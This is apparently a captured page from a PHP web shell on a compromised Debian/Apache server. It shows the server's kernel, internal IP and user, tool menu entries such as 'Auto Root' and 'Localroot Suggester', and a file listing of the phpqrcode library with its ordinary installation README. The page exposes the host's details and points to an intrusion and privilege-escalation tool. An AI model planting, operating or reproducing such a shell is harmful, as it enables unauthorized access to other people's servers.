Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
echasl23 /
phpqrcode /
Delete
Unzip
Name
Size
Permission
Date
Action
bindings
[ DIR ]
drwxr-sr-x
2022-05-04 09:30
cache
[ DIR ]
drwxr-sr-x
2022-05-04 09:30
tools
[ DIR ]
drwxr-sr-x
2022-05-04 09:30
CHANGELOG
1.23
KB
-rw-r--r--
2022-05-04 09:30
INSTALL
1.99
KB
-rw-r--r--
2022-05-04 09:30
LICENSE
7.63
KB
-rw-r--r--
2022-05-04 09:30
README
1.6
KB
-rw-r--r--
2022-05-04 09:30
VERSION
17
B
-rw-r--r--
2022-05-04 09:30
index.php
3.57
KB
-rw-r--r--
2022-05-04 09:30
phpqrcode.php
118.93
KB
-rw-r--r--
2022-05-04 09:30
qrbitstream.php
5.26
KB
-rw-r--r--
2022-05-04 09:30
qrconfig.php
1.41
KB
-rw-r--r--
2022-05-04 09:30
qrconst.php
1.72
KB
-rw-r--r--
2022-05-04 09:30
qrencode.php
17.1
KB
-rw-r--r--
2022-05-04 09:30
qrimage.php
3.54
KB
-rw-r--r--
2022-05-04 09:30
qrinput.php
24.22
KB
-rw-r--r--
2022-05-04 09:30
qrlib.php
1.56
KB
-rw-r--r--
2022-05-04 09:30
qrmask.php
12.29
KB
-rw-r--r--
2022-05-04 09:30
qrrscode.php
8.29
KB
-rw-r--r--
2022-05-04 09:30
qrspec.php
25.99
KB
-rw-r--r--
2022-05-04 09:30
qrsplit.php
11.11
KB
-rw-r--r--
2022-05-04 09:30
qrtools.php
6.18
KB
-rw-r--r--
2022-05-04 09:30
Save
Rename
== REQUIREMENTS == * PHP5 * PHP GD2 extension with JPEG and PNG support == INSTALLATION == If you want to recreate cache by yourself make sure cache directory is writable and you have permisions to write into it. Also make sure you are able to read files in it if you have cache option enabled == CONFIGURATION == Feel free to modify config constants in qrconfig.php file. Read about it in provided comments and project wiki page (links in README file) == QUICK START == Notice: probably you should'nt use all of this in same script :) <?phpb //include only that one, rest required files will be included from it include "qrlib.php" //write code into file, Error corection lecer is lowest, L (one form: L,M,Q,H) //each code square will be 4x4 pixels (4x zoom) //code will have 2 code squares white boundary around QRcode::png('PHP QR Code :)', 'test.png', 'L', 4, 2); //same as above but outputs file directly into browser (with appr. header etc.) //all other settings are default //WARNING! it should be FIRST and ONLY output generated by script, otherwise //rest of output will land inside PNG binary, breaking it for sure QRcode::png('PHP QR Code :)'); //show benchmark QRtools::timeBenchmark(); //rebuild cache QRtools::buildCache(); //code generated in text mode - as a binary table //then displayed out as HTML using Unicode block building chars :) $tab = $qr->encode('PHP QR Code :)'); QRspec::debug($tab, true); == TCPDF INTEGRATION == Inside bindings/tcpdf you will find slightly modified 2dbarcodes.php. Instal phpqrcode liblaty inside tcpdf folder, then overwrite (or merge) 2dbarcodes.php Then use similar as example #50 from TCPDF examples: <?php $style = array( 'border' => true, 'padding' => 4, 'fgcolor' => array(0,0,0), 'bgcolor' => false, //array(255,255,255) ); //code name: QR, specify error correction level after semicolon (L,M,Q,H) $pdf->write2DBarcode('PHP QR Code :)', 'QR,L', '', '', 30, 30, $style, 'N');